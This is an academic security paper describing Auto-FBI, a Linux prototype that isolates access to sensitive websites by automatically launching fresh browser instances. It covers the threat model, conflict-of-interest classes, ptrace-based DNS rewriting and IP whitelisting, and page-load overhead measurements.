We propose a novel and simple approach for securing access to sensitive content on the web. The approach automates the best manual compartmentalization practices for accessing different kinds of content with different browser instances. The automation is transparent to the user and does not require any modification of how non-sensitive content is accessed. For sensitive content, a Fresh Browser Instance (FBI) is automatically created to access the content. Our prototype system `Auto-FBI` can provide support for novice users with predefined sensitive content sites as well as for more experienced users who can define conflict of interest (COI) classes which allows content from sites in the same user-defined class to coexist in a browser instance. Our initial performance evaluation of `Auto-FBI` shows that the overhead introduced by the approach is acceptable (less than 160 ms for sites that already have fast load time, but for slow sites the overhead can be as high as 750 ms).

## 1. INTRODUCTION

Content delivered through web browsers continues to be a major vector of attack in personal computing systems. A large variety of attacks [1, 14, 15, 19, 17] exploit what might be termed *convenience features* of browser content. Executing scripts, such as JavaScript [8], in web browsers enable a richer browsing experience and enabling cookies [11] allow for the convenience maintaining a state across multiple pages. Unfortunately, convenience features also enable richer attack modalities. The tension between providing richer content and providing security is real and it is not only due to technical reasons; the more features a system has, the less likely it is for a novice, or even for an experienced user, to get the system settings right. Default browser security settings do not do much to mitigate the situation. Unless security settings are draconian in nature, such as disabling all active content for example (which will also diminish the browsing experience) they do not solve the problems introduced by these convenience features. The possibility that a browser process is compromised by malicious content increases with the usage of the process. The more sites are visited, the more likely it is that malicious content is running in the browser.

In this paper we are concerned with the protection of the content associated with *sensitive* websites, such as websites of banks or other financial institutions. Compromising access to such websites can have direct financial implications. We consider both passive compromise in the form of information leakage and active compromise in the form of unauthorized access through cross site request forgery [1] for example, amongst many other active attacks. Our approach is to automate what an extra careful user would do. A careful user can *manually* improve security through strict compartmentalization of access. At the extreme, a user can have a computer system dedicated to the access of one website, for online banking for example, and nothing else. A less extreme, but still quite cumbersome approach, would require the user to delete all saved data (history, cookies, passwords for example) after each access and start a new *fresh browser instance* (FBI) for every new access. We call this approach *fresh instance browsing*. For added protection, the most restrictive privacy settings are also used if they do not interfere with site functionality. A less extreme approach would have the user use one machine but multiple browsers; one browser (Firefox for example) can be used for everyday browsing and one browser (Chrome for example) for browsing sensitive websites (following FBI). While such an approach can indeed significantly increase security, it is not practical as most users would not be willing or even able to go through the hassle it involves. The common user pays for convenience features through increased vulnerability. The advantage of using multiple browsers to protect against a variety of attacks has long been folk wisdom and has been established by Chen et al. [5] who propose to implement the isolation and entry-point restrictions (obtained from using multiple browsers) inside one browser. They implement their approach by modifying the Google Chrome browser. In this paper, we also argue that using multiple browsers can significantly increase security, but we take a completely different approach in achieving a user-friendly multiple browser experience. Instead of providing the user with one browser that implements isolation internally, we automatically launch an FBI whenever the current browser instance should not

*Contact author

Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. To copy otherwise, to republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from Permissions@acm.org.
*ACSAC* '13 Dec. 9-13, 2013, New Orleans, Louisiana USA
Copyright 2013 ACM 978-1-4503-2015-3/13/12 ...$15.00.
http://dx.doi.org/10.1145/2523649.2523683

be used to handle the requested website. The launched browser need not be the same as its launcher; the launched browser can be Firefox while the launcher can be Chrome, for example.

We recognize that not all users are equally savvy in setting security preferences. For novice users, we have a very simple default usage model that allows safe browsing for *sensitive sites* and does not change the way users access *non-sensitive sites*. For more experienced users, we have a more nuanced usage model that allows users to define simple yet powerful security preferences to allow them to access multiple sites in the same conflict of interest (COI) instance. This is addressed in more details in Section 3.

### *Auto-FBI.*

We have developed a prototype system called `Auto-FBI` for 64-bit Linux. It works with Google Chrome and Mozilla Firefox. The prototype is mostly written in C except a small part that is written in JavaScript (for Chrome and Firefox extensions).

Our prototype system `Auto-FBI` implements our approach using a number of security techniques. It uses system-call interception to restrict connections to web servers. This requires tracing all the browser's system calls. `Auto-FBI` uses a simple browser extension to obtain the URL that the browser is attempting to access (we give a detailed justification of this approach in Sections 4 and 5). In order not to interfere with browser functionality, sites for which access is restricted for a given instance are serviced through a combination of DNS-query rewriting and replacement of restricted pages with default pages. In order to keep track of all active instances and their COI classes, a daemon outside the browser keeps track of active instances and launches new instances as needed. To communicate the URL of the website being accessed to the daemon, an intermediate process (browser-dependent, written in C) forwards messages between the browser extension and the daemon. Finally, to avoid buffer overflow attacks, URLs are read using constant-bounds while loops. While these techniques are individually not new, we believe that we are using them together in a novel way to achieve our objectives. Details of `Auto-FBI` are given in Sections 4 and 6.

We measured the amount of overhead incurred by our system using a benchmarking software from the Chromium project to compare the amount of time it takes to load a webpage with and without our system. As illustrated in the performance evaluation section later on, the incurred delay is not perceptible to the user for most sites, so we argue that this security scheme that we are proposing is practical.

### *Contributions.*

Unlike most other approaches to browser security whose aim is to protect against information leakage and are based on information flow control [2, 6, 7], our approach provides protection against information leakage (privacy protection) as well as protection against some active attacks (integrity threats). Cross site request forgery (CSRF) [1] and clickjacking (UI redress) [18] attacks are prevented with our approach as far as access to the sensitive websites is concerned. We emphasize here that we are not claiming that our approach prevents all CSRF and clickjacking attacks. We are claiming that no unauthorized access to sensitive content can be done using these attacks. We do not rule out access to sensitive content through other kinds of attacks (such as phishing [16]). This protection is due to the strong compartmentalization of access to sensitive content. On the downside, our approach does not provide fine-grain control and, for the novice user case, can be considered restrictive in its limitation of access to third-party content through sensitive sites. The security guarantees are discussed in Section 5.

The main contributions of the paper are the following:

1. We identify and introduce the automatic fresh browser instance approach (Auto-FBI) as an effective, easy to use, and general approach for providing secure access to sensitive content for novice users. Unlike other approaches, our approach is tolerant of privacy as well as integrity attacks while being browser-independent.

2. We generalize the basic approach to a COI-based Auto-FBI approach that affords experienced users more flexibility and allows them to tailor it to their specific needs.

3. We provide a prototype implementation, `Auto-FBI`, that is the first implementation that we are aware of that provides automatic support for separating accesses to sensitive sites from those to other sites while requiring almost no modification of how the user uses the browser.

The rest of the paper is organized as follows. Section 2 introduces the system and attack model. The usage model from user's perspective is discussed in Section 3. Section 4 introduces the basic Auto-FBI's design and Section 5 discusses the system security guarantees. Section 6 presents Auto-FBI's implementation details and Section 7 presents the performance results. Related work is presented in Section 8. Section 9 concludes the paper.

## 2. SYSTEM AND THREAT MODEL

We identify the relevant components of the system. The system consists of a client side and a server side. Web clients typically run in *web browsers*. Web browsers retrieve *web content* delivered by *web servers*. Web servers and web content have *origins* associated with them. We consider an origin to be a principal (whether or not it is authenticated). Web content is acted upon by the web browser. Content might be *active* which requires the browser to execute some code to process it. We consider a browser that processes content from a given origin to be a *delegate* of the origin. Web content is retrieved using *web queries*. A query can be a *simple query* that specifies the address of the content in the form of a URL (uniform resource locator) which consists of a *domain name* and file path or an *active query* that consists of the above and parameters that are passed to server-side code – *scripts* – that use the parameters to process the query. A web server might require *credentials* from a web browser in order to authenticate the principal requesting queries. Credentials are typically provided when initial access is requested, typically in the form of a *login id and password*. Once credentials are approved, a *cookie* is stored by the browser to be used for future authentication. At that point the browser acts as a delegate of the authenticated principal.

An *instance of a web browser* is a software process that executes the browser code and has associated with it a *profile*

which includes information such as preferences, browsing history, cookies, bookmarks, and saved passwords. A profile captures an *execution state* of the browser. When a browser exits, some information might be deleted from the profile, non persistent cookies for example, but other information in the profile is saved. When a browser is restarted after exiting, the profile provides continuity between the old browser process and the new process.

Given that a browser instance can be processing content from different sources, and therefore is a delegate for these sources, it is important that these various roles do not get mixed together in the browser. For example, a script running in a browser on behalf of one source should not be able in general to read data associated with another source in the browser – such as passwords being entered in a form. Such restrictions are expressed as security policies and are enforced by the browser. Unfortunately, given the great flexibility provided by the browser, scripts have the ability to obtain information indirectly through attempted access to forbidden resources and to communicate directly and indirectly with their origins. This flexibility makes it hard to enforce policies and even when policies are correctly enforced, they might still allow undesired behavior. Single Origin Policy (SOP) is an example of a policy that can be circumvented rather easily [12, 15]. In general, a *security policy* restricts what actions can be done by the various system processes. Abstractly, one can think of a policy as a *set of allowed system executions*. A policy for a web browser expresses what executions of the browser are allowed and which executions are not allowed as seen by an external observer. In other words, a policy on a web browser is a restriction on the input/output behavior of the browser.

A browser is susceptible to an attack relative to a security policy if some browser executions do not satisfy the security policy. We define attacks not in terms of the specific technical modalities to achieve them, but in terms of what can be achieved. In general, an attack requires the browser to get and process content from one or more *attack origins*. In describing an attack we assume that there are at least three classes of origin: HIGH, LOW, and AUTH (authenticated). We assume LOW is disjoint with both HIGH and AUTH, but HIGH and AUTH need not be disjoint. The following are attack models we consider in this paper.

1. Information Leakage (Leakage): An attacker is able to launch an information leakage attack if a LOW origin is able to receive content from a HIGH origin through the browser.

2. Cross Site Request Forgery (CSRF): An attacker is able to launch CSRF attack if requests to an AUTH origin to which the browser is already authenticated *depends on* content from a LOW origin.

3. Clickjacking (UI Redress): UI redress attack is similar to to CSRF attack, but requires user participation by interacting with user interface elements. It is typically achieved by exploiting features of the user interface to let a user interact with a target website when they think that they are interacting with other content.

We realize that the way the attacks are described does not necessarily follow the way they are typically described in the literature, but we opted for a more general description that




**Figure 1:** A request is made to www.bankofamerica.com (top figure). Instead of displaying the requested page in the current instance, `Auto-FBI` displays a message (bottom figure)

emphasizes the attacks capabilities rather than the minutiae of the attack mechanisms.

In this paper we assume that a browser cannot be compromised in a way that enables it to access system resources it is not supposed to access. For example, we assume that the browser will not arbitrarily read and write files it is not supposed to access.

## 3. USE MODEL

In this section, we describe `Auto-FBI` from a user's perspective without consideration to system design or implementation details. We have two implementations, one for novice users and one for experienced users.

### *Novice User.*

A security mechanism has a better chance to be effective if it is well understood and easy to use. This is especially true for novice users. Our basic usage model is quite simple. For a novice user there are two kinds of sites. There are sensitive sites and *everything else*. Access to a sensitive site is done through a dedicated FBI. Access to all other sites is done through separate browser instance(s) as it would be done without `Auto-FBI`. When a user attempts to access a sensitive website by clicking on a link or entering a URL directly in the address bar, an FBI is created to handle the access. When the user finishes accessing the sensitive site, the user can close the FBI or minimize it. If the user later attempts to access the sensitive site from another browser instance, a new instance is activated again, or, if there is an existing active instance for the site, that instance is used to process the request. *For added security, the FBI is opened*




**Figure 2:** The requested page with sensitive content is accessed by a fresh instance of a different browser (Chrome in the figure, top window) while the browser that made the original request (bottom window) only displays a warning message

*without an address bar, menus or tabs to emphasize that the access is meant for only one site.* This simple usage model is preferable to a model that requires the user to define security policies which is not uncommon in mechanisms that are claimed to be transparent [6]. Access for a novice user is illustrated in Figures 1 and 2

### *Experienced User.*

For the experienced user, we generalize our FBI approach to allow content from more than one domain to coexist within a browser instance. The idea is to allow content originating from a conflict of interest (COI) class to coexist within a browser instance. This is essentially the chinese wall policy [3] applied to content producers, which we view as principals, and to the browser which we treat as a delegate of the content producers (it executes code on their behalf). As an example, an experienced user might define a COI class that contains some specific financial institutions and another class that contains some specific news sources. In a given browser instance, content from sources that belong to the same COI class can coexist as separate tabs or as content within the same page if a page links to content from multiple sources in the same COI class.

An experienced user defines conflict of interest classes in a `classes` file. An example file is shown in Figure 3. The file consists of multiple sections, one for each COI class, but the first section specifies common domains, such as certificate authorities, that should be accessible by all COI classes. Each section starts with a line that defines the browser to be used followed by one or more lines that list the domains for the COI class. Any domain that does not appear explicitly in one of the COI classes or the first section is assumed to belong to an implicitly declared *general* COI class.

When a browser is launched by the user, it is associated with the general class. If the user attempts to access a site from a domain in a class other than the general class, then, if there is no active browser instance associated with that class, a new browser instance for that class is created to process and display the site. If there is an active browser instance for the class of the requested site, then the request is processed and displayed in that instance. To allow for using different browsers for different classes, e.g. using Google Chrome for e-commerce and Mozilla Firefox for banking, we specify the browser type rule that should be followed for each class with

```
# Common: includes Certificate Authorities, etc.
>
verisign.com
comodo.com
digicert.com
entrust.net
globalsign.com
tt.omtrdc.net
sb-ssl.google.com

# C1: Banking
>!
americanexpress.com
aexp-static.com
aexp.demdex.net
bankofamerica.com
usbank.com

# C2: E-Commerce
>C
amazon.com
ebay.com
ebaystatic.com
ebayimg.com
```

**Figure 3:** Example COI classes written by an experienced user

a type descriptor (that comes immediately after a `>` in the sample file):

- `'F'`: Mozilla Firefox instance should be used
- `'C'`: Google Chrome instance should be used
- `'='`: the launched browser instance should be the same type as the launcher
- `'!'`: the launched browser instance type should be different from that of the launcher
- `'_'`: places no restriction on the type of the browser

The implicit general class has the implicit type descriptor `'_'`, so both Google Chrome and Mozilla Firefox can be used to browse websites from the general class.

The example file shown in figure 3 has two explicit COI classes (we will refer to them as $C_1$, and $C_2$ as shown in the comments). The first class $C_1$ has type descriptor `'!'` and the second class has type descriptor `'C'`. To demonstrate the user experience, let's consider the following scenario: user opens Google Chrome to start browsing, an instance of Google Chrome of the general class is created. The user can navigate to any site that is not listed in $C_1$ or $C_2$ in that browser instance. If the user tries to navigate to `www.bankofamerica.com` which is listed in $C_1$, a fresh instance of Mozilla Firefox will be created to handle the request. That is because the type descriptor for $C_1$ specifies that an instance with a different type from that of the launcher (Google Chrome in this example) should be used. If the user tries to access `www.facebook.com` from the Mozilla Firefox instance, the request will be handled by the existing Google Chrome instance of the general class. That is because the general class has the implicit type descriptor `'_'` which allows the system to use the available instance. If the user navigates to `www.ebay.com` from any of the previous instances, a new instance of Google Chrome will be launched

to handle the request regardless of the browser type used to initiate the request.

## 4. SYSTEM DESIGN

The basic functionality that we are interested in is an *enforcement mechanism* with the ability to prevent a browser instance from communicating with sources that are not in its COI class and an *enabler mechanism* for starting FBI's as needed. We start by discussing the design alternatives.

### 4.1 Design Alternatives

There are essentially three ways to provide the proposed functionality: (1) inside the browser through modification of the browser code, (2) as a browser extension, or (3) outside the browser. We argue that accessing sensitive sites should be enforced through an enforcement mechanism that resides outside the browser and that launches FBI's. We briefly discuss each of the design options:

- **Enforcement inside the browser:** The desired functionality could be provided by modifying the browser to add the desired enforcement rules. This approach is highly browser-dependent and requires detailed understanding of the browser's code to be implemented. Also, it is not easily maintainable for new versions of a browser and requires different implementations for different browsers. Furthermore, if there are bugs in the implementation, it can compromise the browser's security. We do not recommend this approach because it does not provide a clean separation between the browser's code and the enforcement mechanism.

- **Enforcement in a browser extension:** Providing the desired enforcement as a browser extension is an improvement over enforcement inside the browser. In a browser like Chrome, extensions can be a combination of JavaScript and native code that is controlled by JavaScript. This is not advisable because the JavaScript engine is potentially exposed to malicious scripts from various sources. Any compromise of the engine through such malicious scripts can compromise the enforcement mechanism.

- **Enforcement outside the browser:** Enforcement outside the browser can be achieved by intercepting the browser's system calls and only allowing those calls that are according to policy. This has the advantage of separating the enforcement mechanism from the browser's code. In our implementation, the enforcement mechanism is around 2K lines of code and is browser independent. Adding that code as an extension would require writing different versions for different kinds of browsers. Also, enforcement outside the browser instance obviates the need to make additional restrictive assumptions about the power of the attacker. So, instead of adding an executing browser to the trusted computing base (TCB), we only consider an FBI to be part of the TCB to access sensitive content. The possibility that such an instance is compromised is smaller than that of an executing instance. We elaborate on this point in Section 5. Enforcement outside the browser does not preclude implementing part of the *enabler mechanism* inside the browser. In fact, for technical reasons that we explain later in this section, this is the approach we take. Compromising the enabler mechanism would not allow an attacker to access sensitive content through the wrong browser instance.




**Figure 4:** Execution scenario for handling access to content from a different COI class

### 4.2 System Components

The system has two main components. One component, *enforcer*, intercepts system calls and modifies them as needed to ensure that sensitive content is only accessed through the appropriate instance of the browser. Another component, *enabler* determines when sensitive content is requested and, if needed, launches a new fresh instance of the browser to access the content. These two components are independent and do not communicate with each other.

#### *4.2.1 Enforcer*

*Intercepting System Calls.*
To intercept system calls, we employed the ptrace API available in Linux. This API allows one program (tracer) to be notified and take control of every system call made by another program (browser). The kernel puts the browser to sleep when it makes a system call and notifies the tracer. The tracer can then modify the contents of process virtual memory or registers and then let the browser resume execution. When the system call gets executed and returns from the kernel, and before the control gets back to the browser, the kernel notifies the tracer once more. At this point the tracer can also modify the return value of the system call. Using this API enables us to control every interaction between the browser and the operating system. The ptrace API is also used by many sandboxing applications to control system access.

Among hundreds of system calls available in Linux, we are interested in the following calls: `connect`, `recvfrom` and `read`. The browser issues a `connect` system call when it needs to make a network connection, and it uses `recvfrom` or `read` to receive data from a network host.

*Redirecting DNS Queries.*
When a browser makes a DNS query, the tracer checks whether or not the requested network name is allowed to be accessed by the current browser instance. If it is not

allowed to be accessed, the tracer changes the IP addresses in the DNS response to a predefined IP address which is the loopback address in our implementation. This prevents the browser from connecting to the restricted website. At the same time, the attempted access is detected by the enabler mechanism of `Auto-FBI` and a new instance is launched as needed.

*Intercepting IP Communication.*
The IP addresses used by the browser are not always preceded by DNS queries. In fact for security reasons, IP addresses obtained from DNS queries are typically cached (IP pinning [13]) by browsers even if the TTL from the DNS response is set to 0. We distinguish between three kinds of IP addresses that can be used by a browser and for each kind we explain how it is handled.

- IP addresses that are cached by the browser and obtained from a previous DNS query. IP addresses that are obtained through DNS queries are cached by `Auto-FBI` in a *whitelist* if the original DNS query is not redirected. A later use of such an IP address is compared against `Auto-FBI`'s whitelist of IP addresses. If the IP address is not on the whitelist, it is blocked.
- Browser hardcoded IP addresses. We do not allow the use of any hard-coded IP addresses by the browser. We consider hardcoded addresses to be suspicious and a security risk.
- Hand-coded IP addresses. IP addresses that are directly entered by the user have legitimate usages such as setting up some LAN services (NAT setup for example). Such usages should be allowed. As a policy one can allow some LAN IP addresses and associate a class with each allowed address.

It is interesting to note here that associating a separate class with LAN addresses can prevent DNS rebinding attacks which are not completely solved by DNS pinning [13].

Figure 4 illustrates a scenario in which a browser instance whose COI class is different from that of the website it is trying to connect to. First it makes a DNS query to resolve the IP address (1), the DNS response is detected by the system (2) and the requested domain name is checked against the list of COI classes (3). Since the browser is running in a different class, the system rewrites the IP address in the DNS response (4) and returns the result to the browser. The browser would not have access to the actual IP address for `www.bank.com` and hence it is not able to connect to it. The browser could not communicate directly with `www.bank.com` using the actual IP address of `www.bank.com` because that IP address of `www.bank.com` is not added to the whitelist of the current instance.

#### 4.2.2 Enabler: Launching Fresh Instances

To manage browser instances running in the system and launching new instances, we implemented a daemon which keeps track of all browser instances. The information on which new instances need to be launched comes from the extension component. The extension reports all URLs requested by the user to the daemon and also listens for incoming messages from the daemon in which case it will open the URL in a new tab. The daemon decide how to handle the URL sent by the extension: either open it in an existing browser instance by sending a message to the extension running in that instance or open a fresh instance in case an appropriate instance is not running.

As we discussed in the previous section, having part of the enabler mechanism in the browser does not affect the security of our solution. Even if a browser is compromised and the extension is also compromised, all that would affect is the URL communicated by the extension, but that has no effect on the tracing of system calls and blocking them. That part is independent and is enforced through a mechanism that is completely outside the browser by the *Enforcer*. So, compromising the browser might affect the *progress* requirement of the browser, but does not affect the *safety* requirements of the enforcement.

## 5. SECURITY GUARANTEES

Arguing for the security of our approach is based on the fact that all access to content from one COI class is not allowed in a browser instance associated with another COI class. This is enforced by restricting communication to IP addresses that are on the whitelist for the COI class of the executing browser instance. The IP addresses on the whitelist of one class can be one of the following: (1) IP addresses corresponding to a domain from the common domain list, or (2) IP addresses of a domain in the COI class. So, if DNS is not compromised, only content from sources in a given COI class can run on a browser instance associated with that class. For sensitive content whose servers are typically authenticated, the assumption on DNS not being compromised is not needed and the system provides the desired isolation that ensures that there is no leakage of sensitive content between various instances (assuming the authentication mechanism is secure). This means that attacks such as CSRF or Clickjacking cannot be used to access sensitive content. In fact, content (scripts) used to launch such attacks are assumed to belong to COI classes that are not part of the sensitive COI classes. This is especially evident in the novice user scenario. For the experienced user, a non-judicious choice of classes can pose a security risk.

## 6. IMPLEMENTATION DETAILS

The prototype is composed of two separate modules: (1) Enforcer and (2) Enabler. These modules are sometimes referred to by different names: we use *tracer* to denote the enforcer module and *daemon* to refer to the main component of the enabler module. The implementation is entirely in user space and no modification to the Linux kernel is required.

### 6.1 Enforcer

Using Linux `ptrace` API, we can trace every system call made by a child process to keep track of the application's access to system resources including network and file system. This technique has been employed by sandboxing systems to limit the sandboxed program's access to system resources. However, this method inherently suffers from the Time Of Check Time Of Use race conditions.

There are two options for a tracer to start tracing the tracee: (1) `TRACEME` and (2) `ATTACH`. The first option is usually used in the following way: the tracer forks a new child process and in the child process calls ptrace with

TRACEME command, which causes it to be traceable by its parent process (the tracer), then it runs the target program by calling exec. The second option can be used to trace an already-running-process by attaching to it. The enforcer uses the TRACEME option by default (including the implementation for Firefox), but due to Chrome's use of the SETUID access flag in its sandboxing process[1], the enforcer uses the ATTACH option with Google Chrome. Using ATTACH leaves an enforcement gap: from the time that tracer launches Chrome until the tracer attaches to the browser, the browser is not traced. This should not be a source of vulnerability if the default home pages are safe. Using ATTACH means that part of the enforcer that is involved in setting up the tracing is browser dependent, but the rest of the enforcement when the ATTACH option is used and the whole enforcement using the TRACEME option are generic and not dependent on the browser.

The ptrace API allows one to trace a process and all its child processes and threads by specifying certain options: PTRACE_O_TRACEFORK and PTRACE_O_TRACECLONE. So we can make sure that a process cannot escape the tracer by creating a child process or a new thread.

For every system call made by the tracee, the tracer is notified twice: once before the call is handed over to the kernel for execution and once after the call returns from the kernel but before it is handed back to the tracee. So the tracer has two chances to modify a system call: it can change the parameters provided by the tracee to the kernel, or change the values returned by the kernel. To restrict the browser's access to websites, we need to monitor the following system calls:

- connect: Connects a socket file descriptor to a network address. It is also used for IPC.
- rcvfrom: Receives data through a socket file descriptor
- read: Can be used to receive data from the network (through a socket file descriptor)

#### 6.1.1 DNS Queries

To prevent the browser from accessing certain websites, we keep track of the DNS queries made by the browser to find out if it is trying to connect to a restricted website. We can prevent the access by rewriting the IP addresses in the DNS response to point to a predefined address.

In order to accomplish this, we need to process the following system calls: rcvfrom and read. If the port number[2] matches the port number of the DNS protocol (53), we read the IO buffer from the tracee's memory and analyze the DNS message. If we decide to rewrite the IP addresses in the DNS message, we do so by writing to the tracee's virtual memory[3].

#### 6.1.2 IP White-list

To prevent the browser from connecting to a restricted website by using a hard-coded IP address, we implemented a white-list of IP addresses that the browser is allowed to connect to. Initially, it is populated with the DNS service IP address (usually the local DNS client, 127.0.0.1) and a list of pre-defined IP addresses (to allow for LAN addresses). When the browser makes a DNS query, one of the following happens: either the response is changed to prevent access in case the URL is not allowed or the IP addresses in the response are added to the white-list. When the browser issues a connect system call, we would only allow it to go through if the IP address is in the white-list.

### 6.2 Enabler

#### 6.2.1 Browser Extension

All browser instances are equipped with an extension that is responsible for two tasks: (1) report all user-requested URLs to the daemon and (2) open a new tab for URLs requested by the daemon. When the extension reports a URL to the daemon, the daemon decides if the URL should be handled by the reporting instance or by another instance. We have developed separate JavaScript extensions for Mozilla Firefox and Google Chrome[4]. Since the extensions cannot directly communicate with the daemon, we have a native application written in C that is responsible for forwarding messages between the daemon and the extension. The native application communicates at one end with the browser extension through the browser API (*Native Messaging* API in case of Google Chrome and *js-ctypes* in case of Mozilla Firefox) and it communicates with the daemon on the other end through Unix Domain Sockets. The native application's process is a child process of the browser instance and hence can be considered a part of the browser extension module. It is interesting to note that the code size of the extension (and its associated native application) is small compared to that of the enforcer: around 3K lines of code for the enforcer and daemon vs. 460 for the chrome extension and 280 for the Firefox extension.

#### 6.2.2 Daemon

The daemon is a multi-threaded C program that uses Unix Domain Sockets to communicate with browser extensions. It is responsible for deciding how to handle restricted URLs by either dispatching it to an already-running instance that is allowed to access the URL or creating a fresh new instance.

For every browser instance running in the system, it has a separate thread to communicate with the instance. It keeps a record for each running browser instance along with a queue of outgoing messages for that instance in a shared data structure. When it receives a message from a browser extension, it chooses to either send a message to the browser

[1] Using TRACEME with Chrome would either require root privileges for running the browser which is not desirable or it breaks the browser's internal sandboxing mechanism which uses the SETUID access flag to allow its sandbox process to temporarily run with root privileges. The kernel does not allow a non-root process to trace a process with root privileges using the TRACEME option. In our solution, the enforcer waits until the privilege level is dropped after the sandbox is setup and then then attaches to the main browser process using the ATTACH option of ptrace.

[2] We have used /proc to figure out the remote port number of a socket. Alternatively, we could keep track of all sockets owned by the tracee and the port number specified during the connect call, but this method is error-prone. See [9] for a detailed discussion on why one should avoid replicating the kernel state.

[3] We have used process_vm_readv and process_vm_writev system calls to read/write data from/to the tracee's virtual memory which is much more efficient than using ptrace for this task.

[4] Chrome and Firefox have different APIs for writing extensions: Google Chrome provides chrome.* API and Mozilla Firefox has Add-on SDK as part of the Jetpack project

extension in one of the running browser instances or run a fresh instance. It compares the COI class of the URL contained in the incoming message with that of the sender. If they match, it ignores the message, otherwise it decides how to handle the message according to the `classes` file.

### 6.2.3 *Browser Instances and User Profiles*

A browser instance, as defined in section 2, is associated with a *profile* that captures its execution state. In practice, most browsers support *user profiles* to enable the multi-user use case. User profiles are very similar in different browsers: a folder stored somewhere in the user's home directory that contains information such as the user's web history, cookies, cache, and preferences. Fortunately, most browsers also provide a way of using multiple profiles for a user in addition to the user's default profile. In case of Mozilla Firefox and Google Chrome, creating a fresh instance of the browser is as easy as creating an empty directory and instructing the browser to use that directory to store the user profile (though this would be cumbersome to do manually).

In our implementation, the default user profile (the one managed by the user) is associated with the general COI class. Other COI classes do not have a persistent profile: a temporary profile is created whenever the instance is created and it gets deleted after the instance is closed.

We think this way of managing user profiles is both usable and secure. User spends most of the time using the default profile since most URLs fall into the general COI category, hence allowing the user to manage that profile improves usability. Using temporary profiles for other COI classes ensures tighter security without much effect on usability.

## 6.3 Implementation Limitations

This section discusses some of the limitations of our current implementation. These are limitations of the implementation and not of the approach.

We have implemented the enforcer on 64-bit Linux system using the ptrace API. Working with ptrace API is highly architecture dependent, so porting the program to 32-bit Linux for example would require taking care of word size differences, system call differences, etc. Porting to other platforms or other operating systems might not be possible without major changes. Another limitation of the enforcer is that it does not support IPv6.

We developed the browser extension only for Chrome and Firefox. However, all major browsers support some form of plugin API that allows one to extend the browser functionality. We believe that the same functionality can be achieved for other browsers as well.

Another limitation is the restricted format of class definition file. A more powerful format can allow complex matching expressions for domain names. However, the format we chose was sufficient for our testing purposes.

The daemon process, which is responsible for opening URLs in fresh browser instances, could perform sanity checks on URLs to achieve higher security. For example it could remove the *query part*[5] of the URL. This was not implemented in our prototype.

Our abstract definition of *profile* given in section 2 does not exactly match *user profiles* employed by browsers. Different browser instances even with different types might still be able to share some information with each other although they don't share the same *user profile*. Local shared objects (LSO for short) are among the methods that can be used for such purposes[6]. Our implementation does not address the problem of isolating such objects among different browser instances.

## 7. PERFORMANCE EVALUATION

We measured the amount of overhead incurred by the tracer module, by running the benchmarking extension from the Chromium project for a list of 20 most-visited websites. Table 1 shows the comparison of page load times for these websites for Chromium browser version 25 executed with and without the tracer. The benchmarking extension provides the ability to measure the load times with and without caching, which are shown in the table. For every URL the following 4 combinations are tested, each one averaged over 50 iterations:

1. Chromium running on its own and caching disabled ($T^1_{norm}$)
2. Chromium running with the tracer and caching disabled ($T^1_{tracer}$)
3. Chromium running on its own and caching enabled ($T^2_{norm}$)
4. Chromium running with the tracer and caching enabled ($T^2_{tracer}$)

Then the overhead is calculated by the following formula:

$$\Delta T^1 = T^1_{tracer} - T^1_{norm}$$
$$\Delta T^1\% = \frac{\Delta T^1}{T^1_{norm}} * 100$$

And similarly for $\Delta T^2$. The last three rows of the table show the average over different sets of URLs. *Average for fast sites* shows the average for those sites that have $T_{norm} \leq 1000$ and *Average for slow sites* shows the average for those sites with $T_{norm} > 1000$. The last row shows the average over all 20 websites.

Although the relative overhead is large (about 30 %), the absolute delay is not significantly perceptible to the user and we argue that the overhead is acceptable. In fact for fast sites, the average overhead is less than 250 ms which in absolute terms is not significantly perceptible. For slow sites, the overhead is higher, but the relative overhead is lower. While we think that the overhead of the initial prototype is acceptable, we believe that further improvements to the overhead are needed.

We should note that due to variations in data transfer rates that are unavoidable, the overhead values are negative in a few cases.

[5] An optional part in URLs that comes after a question mark in the URL and is usually in the form of key value pairs. For example in `http://www.example.com/test.jsp?x=1&y=2`, the last part (`?x=1&y=2`) is the query part.

[6] LSOs are similar to HTTP cookies. Websites which use Adobe Flash may store such objects on a user's computer. They can be shared among browsers that use the Flash Player plugin.

| Website URL | Caching Disabled | | | | Caching Enabled | | | |
|---|---|---|---|---|---|---|---|---|
| | $T^1_{norm}$ | $T^1_{tracer}$ | $\Delta T^1$ | $\Delta T^1\%$ | $T^2_{norm}$ | $T^2_{tracer}$ | $\Delta T^2$ | $\Delta T^2\%$ |
| www.youtube.com | 800.6 | 1249 | 448.4 | 56.01 | 696.1 | 1114.5 | 418.4 | 60.11 |
| www.yahoo.com | 953.3 | 890.1 | -63.2 | -6.63 | 869.7 | 1133.3 | 263.6 | 30.31 |
| login.live.com | 701.1 | 817.8 | 116.7 | 16.65 | 655.9 | 498.4 | -157.5 | -24.01 |
| www.msn.com | 368.9 | 772 | 403.1 | 109.27 | 367.2 | 613.2 | 246 | 66.99 |
| en.wikipedia.org | 2101.3 | 2199.5 | 98.2 | 4.67 | 823.4 | 1037.6 | 214.2 | 26.01 |
| blogsofnote.blogspot.com | 522.1 | 1016.7 | 494.6 | 94.73 | 355.8 | 525.9 | 170.1 | 47.81 |
| www.baidu.com | 1433.3 | 954.6 | -478.7 | -33.40 | 848.5 | 589.3 | -259.2 | -30.55 |
| www.microsoft.com | 1269.5 | 2175 | 905.5 | 71.33 | 1606.3 | 1827.9 | 221.6 | 13.80 |
| www.qq.com | 6430.9 | 8179.3 | 1748.4 | 27.19 | 2717 | 3438.5 | 721.5 | 26.56 |
| www.bing.com | 184.1 | 267.5 | 83.4 | 45.30 | 172.6 | 256.7 | 84.1 | 48.73 |
| www.ask.com | 952 | 1184.5 | 232.5 | 24.42 | 891.8 | 1034 | 142.2 | 15.95 |
| www.adobe.com | 1394.6 | 2225.9 | 831.3 | 59.61 | 974.8 | 1626.2 | 651.4 | 66.82 |
| www.taobao.com | 2435.7 | 3286.1 | 850.4 | 34.91 | 1802.2 | 2625.4 | 823.2 | 45.68 |
| twitter.com | 401.6 | 593 | 191.4 | 47.66 | 325.4 | 447.9 | 122.5 | 37.65 |
| www.youku.com | 6427.5 | 5731.2 | -696.3 | -10.83 | 2009.1 | 2638.5 | 629.4 | 31.33 |
